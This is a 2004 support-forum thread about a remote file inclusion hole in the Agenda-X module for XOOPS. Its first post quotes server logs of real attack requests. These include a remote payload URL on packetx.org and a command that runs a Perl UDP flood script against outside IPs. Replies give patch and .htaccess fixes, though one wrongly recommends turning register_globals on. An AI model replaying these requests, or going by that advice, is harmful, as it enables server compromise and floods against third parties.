1
socorro
Agendax vulnerability
  • 2004/5/23 3:56

  • socorro

  • Just popping in

  • Posts: 5

  • Since: 2004/3/21


I was contacted by my network folks telling me of a udp flood attack. We traced to malicious code being run in agendax. It looks like this:

servecity.com:200.222.244.130 - - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 1203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 1203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 1227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:22:28:32 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"


I removed the mod for the moment. I did not find anything here. Anyone know anything?

--> Sorry, I found something deeper in the forum <--

Never mind

2
winsion
Re: Agendax vulnerability
  • 2004/6/1 9:12

  • winsion

  • Just popping in

  • Posts: 55

  • Since: 2003/11/23


I confirm security problem with agendax

One membre of xoops-france was hacked by brasilian hackers.

The blamed file is addevent.inc.php,the variable $agendax_path of this script is obviously not checked

3
philou
Re: Agendax vulnerability
  • 2004/7/3 8:52

  • philou

  • Quite a regular

  • Posts: 384

  • Since: 2002/5/6 8


please don't post this on a public forum....
Some hackers are very happy with this.. they don't have to search anymore.

In fact you should remove or rename this file asap... and do some corrections in this file

4
FlySwatter
Re: Agendax vulnerability
  • 2004/7/4 2:44

  • FlySwatter

  • Just popping in

  • Posts: 71

  • Since: 2004/6/2 1


Quote:

In fact you should remove or rename this file asap... and do some corrections in this file


My sites not live yet, but other than renaming the file, since I don't have the skills to make any corrections, should I just disable agendax?

Mod still seems to work after renmaing the file.

5
wjue
Re: Agendax
  • 2004/7/4 6:38

  • wjue

  • Quite a regular

  • Posts: 315

  • Since: 2002/8/3 7


The vulnerability described in above post affects only Agenda-X versions prior to 1.2.4

Solutions:
configure your PHP installation with register_global to ON
or download Agenda-x v1.2.4

The most recent version of Agenda-X is 2.1.1

---------
Chinese Web: http://www.wjue.org
English Web: http://www.guanxiCRM.com
Offshore IT Outsourcing: http://China-Offshore.com

6
FlySwatter
Re: Agendax
  • 2004/7/4 13:03

  • FlySwatter

  • Just popping in

  • Posts: 71

  • Since: 2004/6/2 1


I feel better now

7
iHackCode
Re: Agendax

Wow, You Gotta Stop Scaring Me.

8
datamile
Re: Agendax
  • 2004/7/5 14:09

  • datamile

  • Just popping in

  • Posts: 22

  • Since: 2002/11/24


My server just got comprised by this.

Is there a list maintained somewhere that people can check.

Just a simple list of module and version would be a start.

The site was running 1.2

9
DonXoop
Re: Agendax

I don't know of a list but you should check the individual home sites of 3rd party modules you are running.

Agendax had a serious security issue and was fixed a while ago.

You should be sure to set Register_Globals OFF. The issue was around calling the addevent.inc.php file directly in the URL. Easy enough to prevent.

I still get daily attempts at this but they still don't get in. To make double sure they don't I have an .htaccess file with this in it:

-------------------------------
php_value register_globals 0


Order Deny,Allow
Deny from all

-------------------------------


Login

Who's Online

143 user(s) are online (125 user(s) are browsing Support Forums)


Members: 0


Guests: 143


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Dec 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits